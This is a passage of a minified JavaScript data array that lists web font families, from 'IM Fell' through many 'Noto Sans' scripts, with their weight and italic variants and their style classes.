Serif",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"IM Fell DW Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell DW Pica SC",v:[400],f:"serif"},{n:"IM Fell Double Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell Double Pica SC",v:[400],f:"serif"},{n:"IM Fell English",v:[400,"400i"],f:"serif"},{n:"IM Fell English SC",v:[400],f:"serif"},{n:"IM Fell French Canon",v:[400,"400i"],f:"serif"},{n:"IM Fell French Canon SC",v:[400],f:"serif"},{n:"IM Fell Great Primer",v:[400,"400i"],f:"serif"},{n:"IM Fell Great Primer SC",v:[400],f:"serif"},{n:"Ibarra Real Nova",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Iceberg",v:[400],f:"display"},{n:"Iceland",v:[400],f:"display"},{n:"Imbue",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Imperial Script",v:[400],f:"handwriting"},{n:"Imprima",v:[400],f:"sans-serif"},{n:"Inconsolata",v:["200","300",400,500,600,700,800,900],f:"monospace"},{n:"Inder",v:[400],f:"sans-serif"},{n:"Indie Flower",v:[400],f:"handwriting"},{n:"Ingrid Darling",v:[400],f:"handwriting"},{n:"Inika",v:[400,700],f:"serif"},{n:"Inknut Antiqua",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Inria Sans",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Inria Serif",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Inspiration",v:[400],f:"handwriting"},{n:"Inter",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Irish Grover",v:[400],f:"display"},{n:"Island Moments",v:[400],f:"handwriting"},{n:"Istok Web",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Italiana",v:[400],f:"serif"},{n:"Italianno",v:[400],f:"handwriting"},{n:"Itim",v:[400],f:"handwriting"},{n:"IBM Plex Sans JP",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Instrument Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Instrument Serif",v:[400,"400i"],f:"serif"},{n:"Inter Tight",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Jacques Francois",v:[400],f:"serif"},{n:"Jacques Francois Shadow",v:[400],f:"display"},{n:"Jaldi",v:[400,700],f:"sans-serif"},{n:"JetBrains Mono",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"monospace"},{n:"Jim Nightshade",v:[400],f:"handwriting"},{n:"Jockey One",v:[400],f:"sans-serif"},{n:"Jolly Lodger",v:[400],f:"display"},{n:"Jomhuria",v:[400],f:"display"},{n:"Jomolhari",v:[400],f:"serif"},{n:"Josefin Sans",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Josefin Slab",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"serif"},{n:"Jost",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Joti One",v:[400],f:"display"},{n:"Jua",v:[400],f:"sans-serif"},{n:"Judson",v:[400,"400i",700],f:"serif"},{n:"Julee",v:[400],f:"handwriting"},{n:"Julius Sans One",v:[400],f:"sans-serif"},{n:"Junge",v:[400],f:"serif"},{n:"Jura",v:["300",400,500,600,700],f:"sans-serif"},{n:"Just Another Hand",v:[400],f:"handwriting"},{n:"Just Me Again Down Here",v:[400],f:"handwriting"},{n:"K2D",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Joan",v:[400],f:"serif"},{n:"Kadwa",v:[400,700],f:"serif"},{n:"Kaisei Decol",v:[400,500,700],f:"serif"},{n:"Kaisei HarunoUmi",v:[400,500,700],f:"serif"},{n:"Kaisei Opti",v:[400,500,700],f:"serif"},{n:"Kaisei Tokumin",v:[400,500,700,800],f:"serif"},{n:"Kalam",v:["300",400,700],f:"handwriting"},{n:"Kameron",v:[400,700],f:"serif"},{n:"Kanit",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Karantina",v:["300",400,700],f:"display"},{n:"Karla",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Karma",v:["300",400,500,600,700],f:"serif"},{n:"Katibeh",v:[400],f:"display"},{n:"Kaushan Script",v:[400],f:"handwriting"},{n:"Kavivanar",v:[400],f:"handwriting"},{n:"Kavoon",v:[400],f:"display"},{n:"Keania One",v:[400],f:"display"},{n:"Kelly Slab",v:[400],f:"display"},{n:"Kenia",v:[400],f:"display"},{n:"Khand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Khmer",v:[400],f:"display"},{n:"Khula",v:["300",400,600,700,800],f:"sans-serif"},{n:"Kings",v:[400],f:"handwriting"},{n:"Kirang Haerang",v:[400],f:"display"},{n:"Kite One",v:[400],f:"sans-serif"},{n:"Kiwi Maru",v:["300",400,500],f:"serif"},{n:"Klee One",v:[400,600],f:"handwriting"},{n:"Knewave",v:[400],f:"display"},{n:"KoHo",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kodchasan",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Koh Santepheap",v:["100","300",400,700,900],f:"display"},{n:"Kolker Brush",v:[400],f:"handwriting"},{n:"Kosugi",v:[400],f:"sans-serif"},{n:"Kosugi Maru",v:[400],f:"sans-serif"},{n:"Kotta One",v:[400],f:"serif"},{n:"Koulen",v:[400],f:"display"},{n:"Kranky",v:[400],f:"display"},{n:"Kreon",v:["300",400,500,600,700],f:"serif"},{n:"Kristi",v:[400],f:"handwriting"},{n:"Krona One",v:[400],f:"sans-serif"},{n:"Krub",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kufam",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Kulim Park",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kumar One",v:[400],f:"display"},{n:"Kumar One Outline",v:[400],f:"display"},{n:"Kumbh Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Kurale",v:[400],f:"serif"},{n:"Kantumruy Pro",v:[100,200,300,400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Kdam Thmor Pro",v:[400],f:"sans-serif"},{n:"Konkhmer Sleokchher",v:[400],f:"display"},{n:"La Belle Aurore",v:[400],f:"handwriting"},{n:"Lacquer",v:[400],f:"display"},{n:"Laila",v:["300",400,500,600,700],f:"sans-serif"},{n:"Lakki Reddy",v:[400],f:"handwriting"},{n:"Lalezar",v:[400],f:"display"},{n:"Lancelot",v:[400],f:"display"},{n:"Langar",v:[400],f:"display"},{n:"Lateef",v:[200,300,400,500,600,700,800],f:"handwriting"},{n:"Lato",v:["100","100i","300","300i",400,"400i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lavishly Yours",v:[400],f:"handwriting"},{n:"League Gothic",v:[400],f:"sans-serif"},{n:"League Script",v:[400],f:"handwriting"},{n:"League Spartan",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Leckerli One",v:[400],f:"handwriting"},{n:"Ledger",v:[400],f:"serif"},{n:"Lekton",v:[400,"400i",700],f:"sans-serif"},{n:"Lemon",v:[400],f:"display"},{n:"Lemonada",v:["300",400,500,600,700],f:"display"},{n:"Lexend",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Deca",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Exa",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Giga",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Mega",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Peta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Tera",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Zetta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Libre Barcode 128",v:[400],f:"display"},{n:"Libre Barcode 128 Text",v:[400],f:"display"},{n:"Libre Barcode 39",v:[400],f:"display"},{n:"Libre Barcode 39 Extended",v:[400],f:"display"},{n:"Libre Barcode 39 Extended Text",v:[400],f:"display"},{n:"Libre Barcode 39 Text",v:[400],f:"display"},{n:"Libre Barcode EAN13 Text",v:[400],f:"display"},{n:"Libre Baskerville",v:[400,"400i",700],f:"serif"},{n:"Libre Bodoni",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Libre Caslon Display",v:[400],f:"serif"},{n:"Libre Caslon Text",v:[400,"400i",700],f:"serif"},{n:"Libre Franklin",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Licorice",v:[400],f:"handwriting"},{n:"Life Savers",v:[400,700,800],f:"display"},{n:"Lilita One",v:[400],f:"display"},{n:"Lily Script One",v:[400],f:"display"},{n:"Limelight",v:[400],f:"display"},{n:"Linden Hill",v:[400,"400i"],f:"serif"},{n:"Literata",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Liu Jian Mao Cao",v:[400],f:"handwriting"},{n:"Livvic",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lobster",v:[400],f:"display"},{n:"Lobster Two",v:[400,"400i",700,"700i"],f:"display"},{n:"Londrina Outline",v:[400],f:"display"},{n:"Londrina Shadow",v:[400],f:"display"},{n:"Londrina Sketch",v:[400],f:"display"},{n:"Londrina Solid",v:["100","300",400,900],f:"display"},{n:"Long Cang",v:[400],f:"handwriting"},{n:"Lora",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Love Light",v:[400],f:"handwriting"},{n:"Love Ya Like A Sister",v:[400],f:"display"},{n:"Loved by the King",v:[400],f:"handwriting"},{n:"Lovers Quarrel",v:[400],f:"handwriting"},{n:"Luckiest Guy",v:[400],f:"display"},{n:"Lusitana",v:[400,700],f:"serif"},{n:"Lustria",v:[400],f:"serif"},{n:"Luxurious Roman",v:[400],f:"display"},{n:"Luxurious Script",v:[400],f:"handwriting"},{n:"Labrada",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"M PLUS 1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS 1 Code",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS 1p",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"M PLUS 2",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS Code Latin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS Rounded 1c",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"Ma Shan Zheng",v:[400],f:"handwriting"},{n:"Macondo",v:[400],f:"display"},{n:"Macondo Swash Caps",v:[400],f:"display"},{n:"Mada",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Magra",v:[400,700],f:"sans-serif"},{n:"Maiden Orange",v:[400],f:"display"},{n:"Maitree",v:["200","300",400,500,600,700],f:"serif"},{n:"Major Mono Display",v:[400],f:"monospace"},{n:"Mako",v:[400],f:"sans-serif"},{n:"Mali",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"handwriting"},{n:"Mallanna",v:[400],f:"sans-serif"},{n:"Mandali",v:[400],f:"sans-serif"},{n:"Manjari",v:["100",400,700],f:"sans-serif"},{n:"Manrope",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mansalva",v:[400],f:"handwriting"},{n:"Manuale",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Marcellus",v:[400],f:"serif"},{n:"Marcellus SC",v:[400],f:"serif"},{n:"Marck Script",v:[400],f:"handwriting"},{n:"Margarine",v:[400],f:"display"},{n:"Markazi Text",v:[400,500,600,700],f:"serif"},{n:"Marko One",v:[400],f:"serif"},{n:"Marmelad",v:[400],f:"sans-serif"},{n:"Martel",v:["200","300",400,600,700,800,900],f:"serif"},{n:"Martel Sans",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Marvel",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Mate",v:[400,"400i"],f:"serif"},{n:"Mate SC",v:[400],f:"serif"},{n:"Maven Pro",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"McLaren",v:[400],f:"display"},{n:"Mea Culpa",v:[400],f:"handwriting"},{n:"Meddon",v:[400],f:"handwriting"},{n:"MedievalSharp",v:[400],f:"display"},{n:"Medula One",v:[400],f:"display"},{n:"Meera Inimai",v:[400],f:"sans-serif"},{n:"Megrim",v:[400],f:"display"},{n:"Meie Script",v:[400],f:"handwriting"},{n:"Meow Script",v:[400],f:"handwriting"},{n:"Merienda",v:[300,400,500,600,700,800,900],f:"handwriting"},{n:"Merriweather",v:["300","300i",400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Merriweather Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Metal",v:[400],f:"display"},{n:"Metal Mania",v:[400],f:"display"},{n:"Metamorphous",v:[400],f:"display"},{n:"Metrophobic",v:[400],f:"sans-serif"},{n:"Michroma",v:[400],f:"sans-serif"},{n:"Milonga",v:[400],f:"display"},{n:"Miltonian",v:[400],f:"display"},{n:"Miltonian Tattoo",v:[400],f:"display"},{n:"Mina",v:[400,700],f:"sans-serif"},{n:"Miniver",v:[400],f:"display"},{n:"Miriam Libre",v:[400,700],f:"sans-serif"},{n:"Mirza",v:[400,500,600,700],f:"display"},{n:"Miss Fajardose",v:[400],f:"handwriting"},{n:"Mitr",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Mochiy Pop One",v:[400],f:"sans-serif"},{n:"Mochiy Pop P One",v:[400],f:"sans-serif"},{n:"Modak",v:[400],f:"display"},{n:"Modern Antiqua",v:[400],f:"display"},{n:"Mogra",v:[400],f:"display"},{n:"Mohave",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Molengo",v:[400],f:"sans-serif"},{n:"Molle",v:["400i"],f:"handwriting"},{n:"Monda",v:[400,700],f:"sans-serif"},{n:"Monofett",v:[400],f:"monospace"},{n:"Monoton",v:[400],f:"display"},{n:"Monsieur La Doulaise",v:[400],f:"handwriting"},{n:"Montaga",v:[400],f:"serif"},{n:"Montagu Slab",v:["100","200","300",400,500,600,700],f:"serif"},{n:"MonteCarlo",v:[400],f:"handwriting"},{n:"Montez",v:[400],f:"handwriting"},{n:"Montserrat",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Montserrat Alternates",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Montserrat Subrayada",v:[400,700],f:"sans-serif"},{n:"Moo Lah Lah",v:[400],f:"display"},{n:"Moon Dance",v:[400],f:"handwriting"},{n:"Moul",v:[400],f:"display"},{n:"Moulpali",v:[400],f:"display"},{n:"Mountains of Christmas",v:[400,700],f:"display"},{n:"Mouse Memoirs",v:[400],f:"sans-serif"},{n:"Mr Bedfort",v:[400],f:"handwriting"},{n:"Mr Dafoe",v:[400],f:"handwriting"},{n:"Mr De Haviland",v:[400],f:"handwriting"},{n:"Mrs Saint Delafield",v:[400],f:"handwriting"},{n:"Mrs Sheppards",v:[400],f:"handwriting"},{n:"Ms Madi",v:[400],f:"handwriting"},{n:"Mukta",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Mahee",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Malar",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Vaani",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mulish",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Murecho",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"MuseoModerno",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"My Soul",v:[400],f:"handwriting"},{n:"Mystery Quest",v:[400],f:"display"},{n:"Marhey",v:[300,400,500,600,700],f:"display"},{n:"Martian Mono",v:[100,200,300,400,500,600,700,800],f:"monospace"},{n:"Material Icons",v:[400],f:"monospace"},{n:"Material Icons Outlined",v:[400],f:"monospace"},{n:"Material Icons Round",v:[400],f:"monospace"},{n:"Material Icons Sharp",v:[400],f:"monospace"},{n:"Material Icons Two Tone",v:[400],f:"monospace"},{n:"Material Symbols Outlined",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Rounded",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Sharp",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Mingzat",v:[400],f:"sans-serif"},{n:"Monomaniac One",v:[400],f:"sans-serif"},{n:"Mynerve",v:[400],f:"handwriting"},{n:"NTR",v:[400],f:"sans-serif"},{n:"Nanum Brush Script",v:[400],f:"handwriting"},{n:"Nanum Gothic",v:[400,700,800],f:"sans-serif"},{n:"Nanum Gothic Coding",v:[400,700],f:"monospace"},{n:"Nanum Myeongjo",v:[400,700,800],f:"serif"},{n:"Nanum Pen Script",v:[400],f:"handwriting"},{n:"Neonderthaw",v:[400],f:"handwriting"},{n:"Nerko One",v:[400],f:"handwriting"},{n:"Neucha",v:[400],f:"handwriting"},{n:"Neuton",v:["200","300",400,"400i",700,800],f:"serif"},{n:"New Rocker",v:[400],f:"display"},{n:"New Tegomin",v:[400],f:"serif"},{n:"News Cycle",v:[400,700],f:"sans-serif"},{n:"Newsreader",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Niconne",v:[400],f:"handwriting"},{n:"Niramit",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Nixie One",v:[400],f:"display"},{n:"Nobile",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Nokora",v:["100","300",400,700,900],f:"sans-serif"},{n:"Norican",v:[400],f:"handwriting"},{n:"Nosifer",v:[400],f:"display"},{n:"Notable",v:[400],f:"sans-serif"},{n:"Nothing You Could Do",v:[400],f:"handwriting"},{n:"Noticia Text",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Emoji",v:["300",400,500,600,700],f:"sans-serif"},{n:"Noto Kufi Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Music",v:[400],f:"sans-serif"},{n:"Noto Naskh Arabic",v:[400,500,600,700],f:"serif"},{n:"Noto Nastaliq Urdu",v:[400,500,600,700],f:"serif"},{n:"Noto Rashi Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Noto Sans Adlam",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Adlam Unjoined",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Anatolian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Armenian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Avestan",v:[400],f:"sans-serif"},{n:"Noto Sans Balinese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bamum",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bassa Vah",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Batak",v:[400],f:"sans-serif"},{n:"Noto Sans Bengali",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Bhaiksuki",v:[400],f:"sans-serif"},{n:"Noto Sans Brahmi",v:[400],f:"sans-serif"},{n:"Noto Sans Buginese",v:[400],f:"sans-serif"},{n:"Noto Sans Buhid",v:[400],f:"sans-serif"},{n:"Noto Sans Canadian Aboriginal",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Carian",v:[400],f:"sans-serif"},{n:"Noto Sans Caucasian Albanian",v:[400],f:"sans-serif"},{n:"Noto Sans Chakma",v:[400],f:"sans-serif"},{n:"Noto Sans Cham",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Cherokee",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Coptic",v:[400],f:"sans-serif"},{n:"Noto Sans Cuneiform",v:[400],f:"sans-serif"},{n:"Noto Sans Cypriot",v:[400],f:"sans-serif"},{n:"Noto Sans Deseret",v:[400],f:"sans-serif"},{n:"Noto Sans Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Noto Sans Duployan",v:[400],f:"sans-serif"},{n:"Noto Sans Egyptian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Elbasan",v:[400],f:"sans-serif"},{n:"Noto Sans Elymaic",v:[400],f:"sans-serif"},{n:"Noto Sans Georgian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Glagolitic",v:[400],f:"sans-serif"},{n:"Noto Sans Gothic",v:[400],f:"sans-serif"},{n:"Noto Sans Grantha",v:[400],f:"sans-serif"},{n:"Noto Sans Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Gunjala Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans HK",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Hanifi Rohingya",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Hanunoo",v:[400],f:"sans-serif"},{n:"Noto Sans Hatran",v:[400],f:"sans-serif"},{n:"Noto Sans Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Imperial Aramaic",v:[400],f:"sans-serif"},{n:"Noto Sans Indic Siyaq Numbers",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Parthian",v:[400],f:"sans-serif"},{n:"Noto Sans JP",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Javanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans KR",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Kaithi",v:[400],f:"sans-serif"},{n:"Noto Sans Kannada",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Kayah Li",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Kharoshthi",v:[400],f:"sans-serif"},{n:"Noto Sans Khmer",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Khojki",v:[400],f:"sans-serif"},{n:"Noto Sans Khudawadi",v:[400],f:"sans-serif"},{n:"Noto Sans Lao",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lepcha",v:[400],f:"sans-serif"},{n:"Noto Sans Limbu",v:[400],f:"sans-serif"},{n:"Noto Sans Linear A",v:[400],f:"sans-serif"},{n:"Noto Sans Linear B",v:[400],f:"sans-serif"},{n:"Noto Sans Lisu",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Lycian",v:[400],f:"sans-serif"},{n:"Noto Sans Lydian",v:[400],f:"sans-serif"},{n:"Noto Sans Mahajani",v:[400],f:"sans-serif"},{n:"Noto Sans Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mandaic",v:[400],f:"sans-serif"},{n:"Noto Sans Manichaean",v:[400],f:"sans-serif"},{n:"Noto Sans Marchen",v:[400],f:"sans-serif"},{n:"Noto Sans Masaram Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Math",v:[400],f:"sans-serif"},{n:"Noto Sans Mayan Numerals",v:[400],f:"sans-serif"},{n:"Noto Sans Medefaidrin",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Meetei Mayek",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Meroitic",v:[400],f:"sans-serif"},{n:"Noto Sans Miao",v:[400],f:"sans-serif"},{n:"Noto Sans Modi",v:[400],f:"sans-serif"},{n:"Noto Sans Mongolian",v:[400],f:"sans-serif"},{n:"Noto Sans Mono",v:["100","200","300",400,500,600,700,800,900],f:"monospace"},{n:"Noto Sans Mro",v:[400],f:"sans-serif"},{n:"Noto Sans Multani",v:[400],f:"sans-serif"},{n:"Noto Sans Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans NKo",v:[400],f:"sans-serif"},{n:"Noto Sans Nabataean",v:[400],f:"sans-serif"},{n:"Noto Sans New Tai Lue",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Newa",v:[400],f:"sans-serif"},{n:"Noto Sans Nushu",v:[400],f:"sans-serif"},{n:"Noto Sans Ogham",v:[400],f:"sans-serif"},{n:"Noto Sans Ol Chiki",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Old Hungarian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Italic",v:[400],f:"sans-serif"},{n:"Noto Sans Old North Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Permic",v:[400],f:"sans-serif"},{n:"Noto Sans Old Persian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Old South Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Turkic",v:[400],f:"sans-serif"},{n:"Noto Sans Oriya",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Osage",v:[400],f:"sans-serif"},{n:"Noto Sans Osmanya",v:[400],f:"sans-serif"},{n:"Noto Sans Pahawh Hmong",v:[400],f:"sans-serif"},{n:"Noto Sans Palmyrene",v:[400],f:"sans-serif"},{n:"Noto Sans Pau Cin Hau",v:[400],f:"sans-serif"},{n:"Noto Sans Phags Pa",v:[400],f:"sans-serif"},{n:"Noto Sans Phoenician",v:[400],f:"sans-serif"},{n:"Noto Sans Psalter Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Rejang",v:[400],f:"sans-serif"},{n:"Noto Sans Runic",v:[400],f:"sans-serif"},{n:"Noto Sans SC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Samaritan",v:[400],f:"sans-serif"},{n:"Noto Sans Saurashtra",v:[400],f:"sans-serif"},{n:"Noto Sans Sharada",v:[400],f:"sans-serif"},{n:"Noto Sans Shavian",v:[400],f:"sans-serif"},{n:"Noto Sans Siddham",v:[400],f:"sans-serif"},{n:"Noto Sans Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Sora Sompeng",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Soyombo",v:[400],f:"sans-serif"},{n:"Noto Sans Sundanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Syloti Nagri",v:[400],f:"sans-serif"},{n:"Noto Sans Symbols",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Symbols 2",v:[400],f:"sans-serif"},{n:"Noto Sans Syriac",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans TC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Tagalog",v:[400],f:"sans-serif"},{n:"Noto Sans Tagbanwa",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Le",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Tham",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Tai Viet",v:[400],f:"sans-serif"},{n:"Noto Sans Takri",v:[400],f:"sans-serif"},{n:"Noto Sans Tamil",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tamil Supplement",v:[400],f:"sans-serif"},{n:"Noto Sans Telugu",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thaana",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai Looped",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tifinagh",v:[400],f:"sans-serif"},{n:"Noto Sans Tirhuta",v:[400],f:"sans-serif"},{n:"Noto Sans Ugaritic",v:[400],f:"sans-serif"},{n:"Noto Sans 